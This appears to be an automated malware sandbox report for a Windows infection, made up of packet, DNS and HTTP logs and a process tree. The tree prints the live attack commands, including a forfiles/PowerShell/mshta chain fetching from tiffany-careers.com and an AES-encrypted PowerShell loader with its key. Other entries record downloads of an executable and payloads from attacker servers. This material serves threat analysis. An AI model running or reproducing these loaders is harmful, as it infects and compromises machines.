                                                                                        Dec 18, 2024 20:55:52.848443985 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.849082947 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.849365950 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.849448919 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.850214958 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.850326061 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.850366116 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.850814104 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.851198912 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.851557016 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.851660967 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.852046013 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.852979898 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.853060007 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.853075981 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.853362083 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.853930950 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.854181051 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.854505062 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.854701996 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.854872942 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.855273008 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.855631113 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.856101990 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.856702089 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.856740952 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.856753111 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.856946945 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.857569933 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.857906103 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.858035088 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.858536959 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.859395027 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.859404087 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.859644890 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.859715939 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.859781027 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.860809088 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.860819101 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.860897064 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.861726046 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.861742020 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.861862898 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.862238884 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.862247944 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.862350941 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.863578081 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.913176060 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.990350008 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.990633965 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.990864992 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.991373062 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.991554022 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.991628885 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.992197990 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.992209911 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.992343903 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.005367041 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.005469084 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.005572081 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.005688906 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.006119967 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.006129026 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.006407022 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.006910086 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.006928921 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.007033110 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.007919073 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.008006096 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.018146992 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.018157959 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.018172979 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.018182039 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.018230915 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.018297911 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.019124985 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.019134045 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.019427061 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.020013094 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.020030022 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.020040035 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.020160913 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.020944118 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.020977974 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.020987988 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.021063089 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.021063089 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.022015095 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.022025108 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.022236109 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.022981882 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.022993088 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.023255110 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.023607969 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.023617983 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.023772955 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.024419069 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.024427891 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.024550915 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.025341034 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.025360107 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.025482893 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:53.026107073 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.026115894 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:53.026195049 CET4979580192.168.2.7139.99.188.124
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 18, 2024 20:55:23.663012981 CET | 192.168.2.7 | 1.1.1.1 | 0xada9 | Standard query (0) | tiffany-careers.com | A (IP address) | IN (0x0001) | false
Dec 18, 2024 20:55:45.314969063 CET | 192.168.2.7 | 1.1.1.1 | 0x4296 | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001) | false
Dec 18, 2024 20:55:56.099431038 CET | 192.168.2.7 | 1.1.1.1 | 0x7f86 | Standard query (0) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | A (IP address) | IN (0x0001) | false
Dec 18, 2024 20:56:12.431711912 CET | 192.168.2.7 | 1.1.1.1 | 0x4c95 | Standard query (0) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | A (IP address) | IN (0x0001) | false
Dec 18, 2024 20:56:21.907043934 CET | 192.168.2.7 | 1.1.1.1 | 0x8d43 | Standard query (0) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | A (IP address) | IN (0x0001) | false
Dec 18, 2024 20:56:36.987596989 CET | 192.168.2.7 | 1.1.1.1 | 0x43fe | Standard query (0) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | A (IP address) | IN (0x0001) | false
Dec 18, 2024 20:57:01.242357969 CET | 192.168.2.7 | 1.1.1.1 | 0xc683 | Standard query (0) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | A (IP address) | IN (0x0001) | false
Dec 18, 2024 20:57:25.710607052 CET | 192.168.2.7 | 1.1.1.1 | 0x8eb2 | Standard query (0) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 18, 2024 20:55:14.490637064 CET | 1.1.1.1 | 192.168.2.7 | 0x79ba | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 18, 2024 20:55:14.490637064 CET | 1.1.1.1 | 192.168.2.7 | 0x79ba | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 20:55:23.893996000 CET | 1.1.1.1 | 192.168.2.7 | 0xada9 | No error (0) | tiffany-careers.com | | 147.45.49.155 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 20:55:45.454336882 CET | 1.1.1.1 | 192.168.2.7 | 0x4296 | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 18, 2024 20:55:56.321098089 CET | 1.1.1.1 | 192.168.2.7 | 0x7f86 | Name error (3) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | none | none | A (IP address) | IN (0x0001) | false
Dec 18, 2024 20:56:12.712999105 CET | 1.1.1.1 | 192.168.2.7 | 0x4c95 | Name error (3) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | none | none | A (IP address) | IN (0x0001) | false
Dec 18, 2024 20:56:22.047095060 CET | 1.1.1.1 | 192.168.2.7 | 0x8d43 | Name error (3) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | none | none | A (IP address) | IN (0x0001) | false
Dec 18, 2024 20:56:37.125062943 CET | 1.1.1.1 | 192.168.2.7 | 0x43fe | Name error (3) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | none | none | A (IP address) | IN (0x0001) | false
Dec 18, 2024 20:57:01.379673004 CET | 1.1.1.1 | 192.168.2.7 | 0xc683 | Name error (3) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | none | none | A (IP address) | IN (0x0001) | false
Dec 18, 2024 20:57:25.847764015 CET | 1.1.1.1 | 192.168.2.7 | 0x8eb2 | Name error (3) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | none | none | A (IP address) | IN (0x0001) | false
• tiffany-careers.com
• 139.99.188.124
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49742 | 147.45.49.155 | 80 | 8128 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Dec 18, 2024 20:55:32.184206009 CET | 77 | OUT | GET /test.pdf HTTP/1.1
Host: tiffany-careers.com
Connection: Keep-Alive
Dec 18, 2024 20:55:33.576278925 CET | 1236 | IN | HTTP/1.1 200 OK
etag: "f92-675e8557-25346;;;"
last-modified: Sun, 15 Dec 2024 07:29:27 GMT
content-type: application/pdf
content-length: 3986
accept-ranges: bytes
date: Wed, 18 Dec 2024 19:55:33 GMT
server: LiteSpeed
connection: Keep-Alive
Dec 18, 2024 20:55:33.975336075 CET | 55 | OUT | GET /BFmcYQ.exe HTTP/1.1
Host: tiffany-careers.com
Dec 18, 2024 20:55:34.443155050 CET | 266 | IN | HTTP/1.1 200 OK
etag: "108a00-675e85db-25347;;;"
last-modified: Sun, 15 Dec 2024 07:31:39 GMT
content-type: application/x-executable
content-length: 1083904
accept-ranges: bytes
date: Wed, 18 Dec 2024 19:55:34 GMT
server: LiteSpeed
connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49766 | 139.99.188.124 | 80 | 7636 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
Dec 18, 2024 20:55:41.614795923 CET | 164 | OUT | GET /hvshp HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: 139.99.188.124
    Connection: Keep-Alive
Dec 18, 2024 20:55:43.083080053 CET | 1236 | IN | HTTP/1.1 200 OK
    Date: Wed, 18 Dec 2024 19:55:42 GMT
    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
    Last-Modified: Sat, 14 Dec 2024 20:29:43 GMT
    ETag: "da2a8-62940cebb8084"
    Accept-Ranges: bytes
    Content-Length: 893608
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49795 | 139.99.188.124 | 80 | 7396 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
Dec 18, 2024 20:55:49.218987942 CET | 74 | OUT | GET /EsgMle.txt HTTP/1.1
    Host: 139.99.188.124
    Connection: Keep-Alive
Dec 18, 2024 20:55:50.738563061 CET | 1236 | IN | HTTP/1.1 200 OK
    Date: Wed, 18 Dec 2024 19:55:50 GMT
    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
    Last-Modified: Sat, 14 Dec 2024 20:29:43 GMT
    ETag: "12fd62-62940cebb8084"
    Accept-Ranges: bytes
    Content-Length: 1244514
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/plain


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49716 | 147.45.49.155 | 443 | 7892 | C:\Windows\System32\mshta.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-18 19:55:25 UTC | 330 | OUT | GET /duydemo HTTP/1.1
    Accept: */*
    Accept-Language: en-CH
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: tiffany-careers.com
    Connection: Keep-Alive
2024-12-18 19:55:26 UTC | 396 | IN | HTTP/1.1 200 OK
    etag: "12b41-675e876c-25348;;;"
    last-modified: Sun, 15 Dec 2024 07:38:20 GMT
    content-length: 76609
    accept-ranges: bytes
    date: Wed, 18 Dec 2024 19:55:25 GMT
    server: LiteSpeed
    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
    connection: close


                                                                                        Target ID:1
                                                                                        Start time:14:55:19
                                                                                        Start date:18/12/2024
                                                                                        Path:C:\Windows\System32\forfiles.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\forfiles.exe" /p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/duydemo
                                                                                        Imagebase:0x7ff709670000
                                                                                        File size:52'224 bytes
                                                                                        MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        Target ID:2
                                                                                        Start time:14:55:19
                                                                                        Start date:18/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff75da10000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:3
                                                                                        Start time:14:55:19
                                                                                        Start date:18/12/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:. \*i*\*2\msh*e https://tiffany-careers.com/duydemo
                                                                                        Imagebase:0x7ff741d30000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:4
                                                                                        Start time:14:55:22
                                                                                        Start date:18/12/2024
                                                                                        Path:C:\Windows\System32\mshta.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\mshta.exe" https://tiffany-careers.com/duydemo
                                                                                        Imagebase:0x7ff72e390000
                                                                                        File size:14'848 bytes
                                                                                        MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        Target ID:6
                                                                                        Start time:14:55:25
                                                                                        Start date:18/12/2024
                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                        Imagebase:0x7ff7b4ee0000
                                                                                        File size:55'320 bytes
                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Target ID:7
                                                                                        Start time:14:55:27
                                                                                        Start date:18/12/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($VGARXd){return -split ($VGARXd -replace '..', '0x$& ')};$DLBqcOk = clean('00952E0EAAA369CB7EDA094FDAAD548DC7EBBE105E37D3A4DD5A7D2DC3C7BDB28C06949289913AE18AFF4985AC0A4A425F444A5427F4855F02DC192D92C9D059910F5326B551C1FBE3BD556C61D517FD26BB0DDA113550D575D28F8A6103693337BF9498AB6F862E4DA5E000AA791D9AA38BFFDF638AEFEB44FA353B1BBC79C0B8F3F039BBFB473DBE5A2163C5297FEA3B449744B787BFD5E3D2D2DC793FA3D42573446DB8C1522E13A7696F37E5C6DFB4339D6F312DA4F7AC3F7F8A272A1C7E6D46C705DC9106ADB9D2690AD45F178F68F3F96535F494B1C112A90293671FCF3A99B408B224F36FEDB31BC4BE9660AB3338DC0571CC95E4819A641F1E63F34EEA383DA81507A9460D2F793F27C40F0BE3CDC495923F94F572D7CC36F0F9BC192B64FFF1EA68FF6DF1267E85703F7CE3A1B2B369CB69B382FA5E5414694A7FAC82DB7EF1CD63E7D0DB286788C22BE423741CE14EED86328E5B0A1B5E6015C081B9ADC5584B188904C72FB7809947462ABB46B4411C8F7467776C4CF5E6DE4A125B51E141F5F377DC69A3A551F363C5B92C853BD07B17D6A6D22B1BB2125B1DAA5AEB4779F820FD87D3A473D74F813C3D317EDD4CA7364858BE4EF1A199CF0CCE68623CFCC2DAE619884748B0669842ADD109C7C2D3C94C5E60D3734508294BF013972C272FD970EC7823EEF4EC60519B53B7CB23D4B5AB2A35FFDA992A39E95A2EA920D0A343160707DD5A2D29AE6EF568D25D354BAD060EEB2312EFC70E382228038F6E3AAFBE6DA3F033EC03FCFAC2E6474AA92901C29C7E935F0EF9256603E50E9AE54F28C64EB0B62541C16C81B31F123EB1F62AA075030DF335F2F233B1D0572DB1344253CB16FC57D50EA0FEC5F117610698B3981E1FE1037593D2F25954CEB7AA7476166501E6E91201EA06DCEA504BF1755984B1EB672A8368994F7FC4C67586ED78251A2F06F39283D3DE14A0B398BD25B7578AD0901A36303C6EEAE780BD3A96D106C54D28D9174422CFC0C12EED237BB3D9D8B8C0BEF9DE95A209C8CC66E2B538F79DDAF3183835A0F7F6694A40776335E75BDECD48A839EC0682B59CFA1D33BB11A349DDBB588B3F645CB31E55E0AB2543363E815610EB013DEB7CE8EC26A913B7BEF508C1825E8C10EB3320C2D1CE31D968F2E47C293CD02C39B499523127D609CCD06DC157D6D2B498A34CF14B0E20BF6BC402B4A171
A623AF24253354BF256B06B278DBBE05F05B405CAA69A5B27D9635119927475C932D7E26F612B9A6119E0DA2D95273F043B8BF88A54B8C708E55E08264CBA9B31BE5DF8578C4F53770C16C752FFC20FF1177103B4E88CB671AD1E8922D66CED32F4A427EA0E9009B24EE692A0DF6E540DDA0214C6CED115113D1DE60DB67E356E2FA9994FEE2C1D1BB4C9EFCC878383644915EAE6C54AB94C50C12CF86B0105A8EF91D6ABC4C61CDFB58006AC5F6D6B39AB88817B83AB53CE4965B39228AF37E6A49E5392F23C9553BCF4075260DF9B4FE20DB589FB4EA5567B6AE3A73FA2FA7C96B3C25C044D663A965CC679968E22349FD362344D3981B8482F16667D5829063A00F894C03FC9CC5753DD640CC66AB7B73D992518CF818B20CE25E63E80DE29C8CB1804C28C38743BBA0ABCEE4631FB8ECE9886E143AC598E0CFF0E0EDF7EB943C8A');$fgNcqNX = [System.Security.Cryptography.Aes]::Create();$fgNcqNX.Key = clean('764F4D5163617754716D4B6C6E447878');$fgNcqNX.IV = New-Object byte[] 16;$ckcAaXbLZ = $fgNcqNX.CreateDecryptor();$lGOPfxpiP = [Text.Encoding]::UTF8.GetString($ckcAaXbLZ.TransformFinalBlock($DLBqcOk, 0,$DLBqcOk.Length)); & $lGOPfxpiP.Substring(0,3) $lGOPfxpiP.Substring(3)
                                                                                        Imagebase:0x7ff741d30000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:8
                                                                                        Start time:14:55:28
                                                                                        Start date:18/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff75da10000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:11
                                                                                        Start time:14:55:33
                                                                                        Start date:18/12/2024
                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\test.pdf"
                                                                                        Imagebase:0x7ff702560000
                                                                                        File size:5'641'176 bytes
                                                                                        MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Target ID:12
                                                                                        Start time:14:55:35
                                                                                        Start date:18/12/2024
                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                        Imagebase:0x7ff6c3ff0000
                                                                                        File size:3'581'912 bytes
                                                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Target ID:13
                                                                                        Start time:14:55:35
                                                                                        Start date:18/12/2024
                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1652,i,1199563268995675022,292876181194953866,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                        Imagebase:0x7ff6c3ff0000
                                                                                        File size:3'581'912 bytes
                                                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Target ID:14
                                                                                        Start time:14:55:37
                                                                                        Start date:18/12/2024
                                                                                        Path:C:\Users\user\AppData\Roaming\BFmcYQ.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\AppData\Roaming\BFmcYQ.exe"
                                                                                        Imagebase:0x7ff74d030000
                                                                                        File size:1'083'904 bytes
                                                                                        MD5 hash:085AE742872C761A3485E075756E4781
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Antivirus matches:
                                                                                        • Detection: 33%, ReversingLabs
                                                                                        Has exited:true

                                                                                        Target ID:15
                                                                                        Start time:14:55:37
                                                                                        Start date:18/12/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
